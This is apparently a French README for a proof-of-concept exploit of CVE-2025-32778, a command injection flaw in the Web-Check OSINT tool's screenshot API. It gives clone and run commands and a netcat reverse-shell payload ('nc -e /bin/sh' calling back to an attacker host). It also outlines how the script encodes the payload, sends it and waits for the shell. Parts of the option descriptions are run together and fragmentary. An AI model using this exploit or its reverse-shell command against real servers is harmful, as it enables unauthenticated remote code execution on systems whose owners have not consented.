
Exploit PoC pour CVE-2025-32778 : injection de commande dans l'outil OSINT Web-Check
CVE-2025-32778 est une vulnérabilité critique d'injection de commandes dans l'outil OSINT Web-Check de Lissy93.
Elle permet à des attaquants non authentifiés d'exécuter des commandes système arbitraires via le paramètre url dans l'API de capture d'écran.
Ce script Python automatise l'exploitation et peut générer des shells inversés ou accepter des charges utiles personnalisées.
url--lhost et --lport.--shell.--shell avec --lhost/--lport.pip install requests
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778
python3 cve-2025-32778.py -u http://cible.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
python3 cve-2025-32778.py -u http://cible.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
python3 cve-2025-32778.py -h
Normalise l'URL cible en scheme://host[:port].
Prépare la charge utile :
--lhost et --lport.--shell.Encode la charge utile du shell pour une injection sécurisée dans l'URL.
Envoie une requête HTTP GET vers /api/screenshot/ avec la charge utile.
Attend la connexion du shell inversé.
00xCanelo
Profil GitHub